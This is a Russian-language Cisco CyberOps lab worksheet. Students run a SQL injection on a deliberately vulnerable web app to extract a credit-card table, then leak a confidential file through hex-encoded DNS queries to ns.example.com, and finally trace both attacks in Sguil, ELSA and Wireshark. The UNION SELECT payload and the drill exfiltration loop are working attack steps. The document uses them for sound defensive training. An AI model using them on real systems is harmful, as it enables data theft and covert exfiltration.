Лабораторная работа.

Интерпретация данных HTTP и DNS для

изоляции злоумышленника
Топология

Задачи
В этой лабораторной работе вы будете отслеживать по журналам использование известных
уязвимостей DNS и HTTP.
Часть 1. Подготовка виртуальной среды
Часть 2. Изучение атаки на основе внедрения вредоносного кода SQL
Часть 3. Организация утечки данных с использованием DNS

Общие сведения и сценарий

MySQL является популярной базой данных, которая используется множеством веб-приложений.
К сожалению, внедрение SQL-кода — это распространенная методика взлома в Интернете. Эта
методика состоит во внедрении кода, в котором злоумышленник выполняет вредоносные инструкции
SQL для управления сервером базы данных веб-приложений.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 1 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

Серверы доменных имен (DNS) являются каталогами доменных имен, и они преобразовывают
доменные имена в IP-адреса. Эту службу можно использовать для извлечения данных.
В этой лабораторной работе вы внедрите SQL-код для получения доступа к базе данных SQL на
сервере. Вы также будете использовать службы DNS для организации утечки данных.

Необходимые ресурсы
 Хост-компьютер с не менее 8 ГБ ОЗУ и 40 ГБ свободного дискового пространства
 Последняя версия Oracle VirtualBox
 Интернет-подключение
 Четыре виртуальные машины:

Дисковое Имя
Виртуальная машина RAM пространство пользователя Пароль

Виртуальная машина 1 Гбайт 7 ГБ analyst Cyberops

рабочей станции
CyberOps
Kali 1 Гбайт 10 Гбайт корневой Cyberops
Metasploitable 512 КБ 8 ГБ msfadmin Msfadmin
Security Onion 3 ГБ 10 Гбайт analyst Cyberops

Часть 1: Подготовка виртуальной среды

a. Запустите Oracle VirtualBox.
b. В окне CyberOps Workstation убедитесь, что на CyberOps Workstation настроены правильные сетевые
параметры. При необходимости выберите Machine > Settings > Network (Машина > Параметры >
Сеть). В разделе Attached To (Присоединена к) выберите Internal Network (Внутренняя сеть).
В раскрывающемся меню Name (Имя) выберите inside, а затем нажмите кнопку ОК.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 2 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

c. Запустите виртуальные машины CyberOps Workstation, Kali, Metasploitable и Security Onion, выбрав
их и нажав кнопку Start (Пуск). Кнопка Start (Пуск) находится на панели инструментов в VirtualBox.
d. Войдите в виртуальную машину CyberOps Workstation, откройте терминал и настройте сеть,
выполнив сценарий configure_as_static.sh.
Поскольку сценарий требует прав суперпользователя, введите пароль для пользователя analyst.
analyst@secOps ~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] пароль для analyst:
Configuring the NIC as:
IP: 192.168.0.11/24
GW: 192.168.0.1

IP Configuration successful.

[analyst@secOps ~]$

e. Войдите в виртуальную машину Security Onion. Щелкните правой кнопкой мыши Desktop > Open
Terminal Here (Рабочий стол > Открыть терминал здесь). Введите команду sudo service nsm
status, чтобы убедиться, что все серверы и датчики готовы. Этот процесс может занять некоторое
время. Повторяйте команду до тех пор, пока все состояния для всех серверов и датчиков не
примут значение «OK», после чего перейдите к следующей части.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started
manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Часть 2: Изучение атаки на основе внедрения вредоносного кода SQL

В этой части лабораторной работы вы внедрите вредоносный код SQL, чтобы получить доступ
к информации кредитной карты, которая хранится на веб-сервере. Виртуальная машина Metasploitable
работает в качестве веб-сервера, и на ней настроена база данных MySQL.

Шаг 1: Выполните внедрение вредоносного кода SQL.

a. Войдите в виртуальную машину Kali с помощью имени пользователя root и пароля cyberops.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 3 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

b. В виртуальной машине Kali щелкните значок Firefox ESR ( ), чтобы открыть новое окно веб-
браузера.
c. Перейдите на узел 209.165.200.235. Щелкните Mutillidae, чтобы открыть уязвимый веб-сайт.

d. Нажмите OWASP Top 10 > A1 — Injection (Внедрение)> SQLi — Extract Data (Извлечь данные)>
User Info (Информация о пользователе).

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 4 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

e. Щелкните правой кнопкой мыши по полю Name (Имя) и выберите Inspect Element (Изучить
элемент) (Q).

f. В поле имени пользователя дважды щелкните 20 и измените значение на 100, чтобы видеть более
длинную строку при вводе запроса в поле Name (Имя). Сделав это, закройте Inspect Element
(Изучить элемент).

g. Введите строку ' union select ccid,ccnumber,ccv,expiration,null from credit_cards -- в поле Name
(Имя). Щелкните View Account Details (Просмотреть сведения учетной записи) для получения
информации о кредитной карте из таблицы credit_cards базы данных mysql с именем owasp10.
Примечание. Строка начинается с одиночной кавычки ( ' ), после которой следует пробел. Также
в конце строки стоит пробел после символов --.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 5 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

h. Прокрутите страницу вниз, чтобы увидеть результаты. Результат показывает, что вы успешно
извлекли информацию о кредитной карте из этой базы данных с помощью внедрения
вредоносного кода SQL. Эта информация должна быть доступна только для авторизованных
пользователей.

Шаг 2: Просмотрите журналы Sguil.

a. Перейдите к виртуальной машине Security Onion. Дважды щелкните пиктограмму Sguil на рабочем
столе. По запросу введите имя пользователя analyst и пароль cyberops.
b. Щелкните Select All (Выбрать все), чтобы отслеживать все сети. Для продолжения нажмите Start
SGUIL (Запустить SGUIL).
c. В консоли Sguil в нижнем правом углу окна щелкните Show Packet Data (Показать пакетные
данные) и Show Rule (Показать правило) для просмотра сведений о выбранном оповещении.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 6 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

d. Поиск оповещений, связанных с ET WEB_SERVER Possible SQL Injection Attempt UNION
SELECT (ET WEB_SERVER возможная попытка внедрения SQL UNION SELECT). Выберите
оповещения, которые начинаются с 7. Эти оповещения относятся к seconion-eth2-1, и это,
вероятно, самые последние оповещения. Поскольку Sguil отображает события в режиме реального
времени, то Date/Time (Дата/Время) на снимке экрана служат исключительно для справки.
Запомните дату и время выбранного оповещения.

e. Щелкните правой кнопкой мыши по номеру под заголовком CNT для выбранного оповещения,
чтобы просмотреть все связанные оповещения. Выберите View Correlated Events (Просмотр
связанных событий).

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 7 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

f. Щелкните правой кнопкой мыши по идентификатору оповещения в результатах. Выберите

Transcript (Запись) для просмотра сведений для этого оповещения.
Примечание. При неправильном вводе информации о пользователе на предыдущем шаге вы
должны использовать последнее оповещение в списке.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 8 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

g. В этом окне вы видите, что заявление GET с помощью оператора UNION было использовано для
доступа к информации кредитной карты. Если вы не видите эту информацию, попробуйте
щелкнуть правой кнопкой мыши по другим взаимосвязанным событиям.
Примечание. Если вы ввели сценарий внедрения более одного раза из-за опечатки или по другой
причине, то может быть полезно отсортировать столбец Date/Time (Дата/Время), чтобы видеть
только последние оповещения.

Какую информацию можно получить в окне Transcript (Запись)?

____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
h. Также можно определить данные, полученные хакером. Щелкните Search (Поиск) и введите имя
пользователя в поле поиска. Нажмите кнопку Find (Найти), чтобы начать поиск перехваченной
информации. Аналогичная информация кредитной карты может отличаться от той, которая
приведена на рисунке ниже.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 9 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

Примечание. Если вам не удается найти украденную информацию кредитной карты, то, возможно,
нужно просмотреть запись другого оповещения.

Сравните информацию кредитной карты из окна записи с содержимым, извлеченным в ходе атаки
на основе внедрения вредоносного кода SQL. Каков вывод?
____________________________________________________________________________________
i. Просмотрев данные, закройте данное окно.
j. Вернитесь к окну Sguil, щелкните правой кнопкой мыши по этому же идентификатору оповещения,
которое содержит извлеченную информацию кредитной карты, и выберите Wireshark.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 10 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

k. Щелкните правой кнопкой мыши по пакету TCP и выберите Follow TCP stream (Отслеживать
поток TCP).

l. В окне TCP stream отображается запрос GET и извлеченные данные. Ваши выходные данные
могут отличаться от тех, которые приведены на рисунке ниже, но они должны содержать ту же
информацию кредитной карты, что и запись выше.

m. В этот момент вы можете сохранить данные Wireshark, нажав кнопку Save As (Сохранить как)
в окне потока TCP. Также можно сохранить файл pcap, сформированный Wireshark. Можно также
задокументировать IP-адреса источника и назначения, порты, время происшествий и протокол,
используемый для дальнейшего анализа аналитиком уровня 2.
n. Закройте или сверните Wireshark и Squil.

Шаг 3: Просмотрите журналы ELSA.

Журналы ELSA содержат примерно такую же информацию.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 11 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

a. В ВМ Security Onion запустите ELSA с рабочего стола. Если вы получили сообщение Your
connection is not private (Ваше подключение не является частным), то щелкните ADVANCED
(ДОПОЛНИТЕЛЬНО) для продолжения.

b. Нажмите Proceed to localhost (unsafe) (Перейти на локальный хост-компьютер

(небезопасно)), чтобы перейти на локальный хост-компьютер.
c. Войдите в систему под именем пользователя analyst с паролем cyberops.
d. На панели слева выберите HTTP > Top Potential SQL Injection (Основные потенциальные
внедрения SQL-кода). Выберите 209.165.200.235.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 12 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

e. Щелкните Info (Информация) на последней записи. В данном случае это описание успешного
внедрения SQL-кода. Обратите внимание на запрос union, который использовался во время атаки.

f. Выберите Plugin (Подключаемый модуль) > getPcap. По запросу введите имя пользователя
analyst и пароль cyberops. При необходимости нажмите кнопку Submit (Отправить). CapMe —
это веб-интерфейс, который позволяет получить запись pcap или загрузить файл pcap.

g. Запись pcap отображается с помощью средства tcpflow, и эта страница также содержит ссылку для
доступа к соответствующему файлу pcap. Также можно выполнить поиск информации об имени
пользователя. Введите Ctrl + F для открытия диалогового окна Find... (Найти...). В поле введите
имя пользователя. Вы увидите данные кредитной карты, которые отображались во время
внедрения вредоносного SQL-кода.

Часть 3: Организация утечки данных с использованием DNS

Виртуальная машина CyberOps Workstation содержит файл с именем confidential.txt в каталоге
/home/analyst/lab.support.files. Злоумышленник на виртуальной машине Kali будет использовать DNS
для извлечения содержимого файла из ВМ CyberOps Workstation. Хакер получил доступ к рабочим
станциям виртуальных машин CyberOps Workstations и Metasploitable. Виртуальная машина
Metasploitable настроена в качестве сервера DNS.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 13 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

Шаг 1: Преобразуйте текстовый файл в шестнадцатеричный файл.

a. На CyberOps Workstation перейдите в /home/analyst/lab.support.files/. Убедитесь, что файл
confidential.txt есть в этом каталоге.
b. Выведите на экран содержимое файла confidential.txt, используя команду more.
c. Команда xxd используется для создания шестнадцатеричного дампа и преобразования такого
дампа обратно в двоичный формат. Преобразуйте содержимое confidential.txt
в шестнадцатеричные строки по 60 байт и сохраните их в файле confidential.hex командой xxd -p
confidential.txt > confidential.hex.
Параметр -p используется для форматирования выходных данных в формат Postscript, а символ >
используется для перенаправления выходных данных в confidential.hex.
Примечание. Используйте страницу xxd man, чтобы узнать больше обо всех доступных
параметрах команды xxd.
[analyst@secOps lab.support.files]$ xxd -p confidential.txt > confidential.hex
d. Проверьте содержимое файла confidential.hex.
[analyst@secOps lab.support.files]$ cat confidential.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572
697479206272656163682e0a
e. Проверьте, что в ВМ CyberOps Workstation настроен локальный распознаватель DNS с адресом
209.165.200.235. Введите в командной строке cat /etc/resolv.conf.
[analyst@secOps lab.support.files]$ cat /etc/resolv.conf
# Generated by resolvconf
nameserver 8.8.4.4
nameserver 209.165.200.235

Шаг 2: Добавьте это содержимое в начало журнала запросов DNS.

На этом этапе запускается цикл оболочки Bash for, в котором будут перебираться все строки файла
confidential.hex. Каждая строка в шестнадцатеричном виде будет добавляться к имени целевого
сервера доменных имен ns.example.com. Для каждой из этих новых строк выполняется DNS-запрос.
Его результаты будут выглядеть следующим образом.
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e.ns.example.com
666f726d6174696f6e2061626f757420746865206c617374207365637572 ns.example.com
72697479206272656163682e0a ns.example.com
В данном цикле for команда cat confidential.hex заключена в апострофы (') и выполняется для вывода
на экран содержимого файла. Каждая шестнадцатеричная строка файла confidential.hex временно
хранится в переменной line. Содержимое переменной line добавляется в начало строки
ns.example.com в команде drill. Команда drill предназначена для получения информации из DNS.
Примечание. Апостроф чаще всего находится на клавиатуре рядом с клавишей 1. Это не символ
отдельной кавычки, который направлен прямо вверх и вниз.
Команду необходимо вводить в командной строке именно таким образом, как показано ниже. Этот
процесс может занять от нескольких секунд до нескольких минут. Дождитесь, когда снова появится
приглашение командной строки.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 14 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

[analyst@secOps lab.support.files]$ for line in `cat confidential.hex` ; do

drill $line.ns.example.com; done
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 19375
;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 
;; QUESTION SECTION:
;; QUESTION SECTION:
;; 434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com.IN A

;; ANSWER SECTION:

;; AUTHORITY SECTION:
example.com. 604800 IN SOA ns.example. root.example.com. 2 604800 86400
2419200 604800

;; ADDITIONAL SECTION:

;; Query time: 4 msec

;; SERVER: 209.165.200.235
;; WHEN: Wed Jun 28 14:09:24 2017
;; MSG SIZE rcvd: 144
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 36116
;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

<некоторые выходные данные пропущены>

Шаг 3: Извлечение журнала запросов DNS.

На этом этапе злоумышленник на ВМ Kali может получить доступ к файлу /var/lib/bind/query.log
и извлечь его данные.
a. Войдите в Kali, при необходимости откройте терминал и подключитесь по SSH к ВМ Metasploitable,
используя имя пользователя user и пароль user. Введите yes, чтобы продолжить подключение
к Metasploitable при появлении соответствующего запроса. Время ожидания появления запроса на
ввод пароля может занять от нескольких секунд до минуты.
root@kali:~# ssh user@209.165.200.235
The authenticity of host '209.165.200.235 (209.165.200.235)' can't be
established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '209.165.200.235' (RSA) to the list of known hosts.
user@209.165.200.235's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 15 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/
Last login: Wed Aug 30 11:24:13 2017 from 209.165.201.17
user@metasploitable:~$
b. Используйте следующую команду egrep для анализа файла журнала запросов DNS с именем
/var/lib/bind/query.log.
Команду необходимо вводить в командной строке именно таким образом, как показано ниже.
user@metasploitable:~$ egrep -o [0-9a-f]*.ns.example.com
/var/lib/bind/query.log | cut -d. -f1 | uniq > secret.hex
 Команда grep аналогична команде grep -E. Параметр -E позволяет выполнять
интерпретацию расширенных регулярных выражений.
 Параметр -o отображает только совпадающие фрагменты.
 Расширенное регулярное выражение [0-9a-f]]*.ns.example.com соответствует строкам
query.log, содержащим нуль и более строчных букв и цифр и завершающимся строкой
ns.example.com.
 Команда cut удаляет некоторый фрагмент в каждой строке файла. Команда cut -d. -f1
использует точку (.) в качестве разделителя для сохранения в строке только поддомена
и удаления остальной части строки с полностью квалифицированным именем домена (FQDN).
 Команда uniq удаляет все дубликаты.
 Вертикальная черта (|) принимает выходные данные команды слева, которые становятся
входными данными для команды с правой стороны вертикальной черты. В этих командах
вертикальная черта присутствует в двух местах.
 И наконец, результат перенаправляется в файл secret.hex.
c. Выведите на экран этот шестнадцатеричный файл с помощью команды cat.
user@metasploitable:~$ cat secret.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572
697479206272656163682e0a
Содержимое файла будет совпадать с содержимым файла confidential.hex на CyberOps
Workstation.
d. Закройте сеанс SSH с Metasploitable.
user@metasploitable:~$ exit
выход
2176 Connection to 209.165.200.235 closed.
e. Используйте команду защищенного копирования (scp), чтобы скопировать файл secret.hex из
виртуальной машины Metasploitable на виртуальную машину Kali. При появлении запроса введите
user в качестве пароля. Это может занять несколько минут.
root@kali:~# scp user@209.165.200.235:/home/user/secret.hex ~/
user@209.165.200.235's password:
secret.hex 100% 3944 3.1MB/s 00:00

f. Убедитесь, что этот файл является копией файла с виртуальной машины Kali.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 16 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

g. Теперь нужно преобразовать шестнадцатеричный дамп, чтобы увидеть содержимое извлеченного

файла secret.hex. Команда xxd с параметрами - r -p преобразует шестнадцатеричный дамп.
Результат перенаправляется в файл secret.txt.
root@kali:~# xxd -r -p secret.hex > secret.txt
h. Убедитесь, что содержимое файла secret.txt аналогично содержимому файла confidential.txt на
виртуальной машине CyberOps Workstation.
root@kali:~# cat secret.txt
КОНФИДЕНЦИАЛЬНЫЙ ДОКУМЕНТ
НЕ ПРЕДОСТАВЛЯТЬ ОБЩИЙ ДОСТУП
Этот документ содержит информацию о последнем нарушении безопасности.
i. Теперь можно выключить виртуальные машины CyberOps Workstation, Metasploitable и Kali.

Шаг 4: Анализ извлечения данных DNS.

На предыдущих шагах злоумышленник извлек данные DNS с помощью средств Linux. Теперь ваша
задача — получить содержимое этой утечки.
a. Войдите в Security Onion и запустите ELSA с рабочего стола. Если вы получили сообщение Your
connection is not private (Ваше подключение не является частным), то щелкните ADVANCED
(ДОПОЛНИТЕЛЬНО) для продолжения. Нажмите Proceed to localhost (unsafe) (Перейти на
локальный хост-компьютер (небезопасно)), чтобы перейти на локальный хост-компьютер. По
запросу введите имя пользователя analyst и пароль cyberops.
b. Из ELSA запросов на левой боковой панели щелкните DNS > Bottom (Снизу) слева от запросов.
Этот запрос возвращает записи для всех запросов DNS, отсортированных таким образом, что
наименее частые отображаются первыми. Прокрутите результаты запроса вниз до запросов
к сайту ns.example.com с шестнадцатеричной строкой в качестве первой части имени поддомена.
Как правило, имена доменов не являются шестнадцатеричными выражениями длиной 63 байта.
Это может быть признаком вредоносной активности, поскольку пользователи вряд ли могут
помнить длинное имя домена с набором случайных букв и цифр.

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 17 из 18 www.netacad.com
Лабораторная работа. Интерпретация данных HTTP и DNS для изоляции хакера

c. Выберите одну из таких ссылок и скопируйте 63-байтовую строку, которая идет перед адресом
ns.example.com.

d. Откройте окно терминала и используйте команды echo и xxd для преобразования этой
шестнадцатеричной строки. Параметр -n предотвращает вывод конца переноса строки.
analyst@SecOnion:~/Desktop$ echo -n
"434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053" | xxd -r -p
КОНФИДЕНЦИАЛЬНЫЙ ДОКУМЕНТ
НЕ analyst@SecOnion:~/Desktop$
Если продолжить возврат шестнадцатеричных строк, то каким будет результат?
____________________________________________________________________________________
____________________________________________________________________________________

 Cisco и/или ее дочерние компании. Все права защищены.

Конфиденциальная информация корпорации Cisco Стр. 18 из 18 www.netacad.com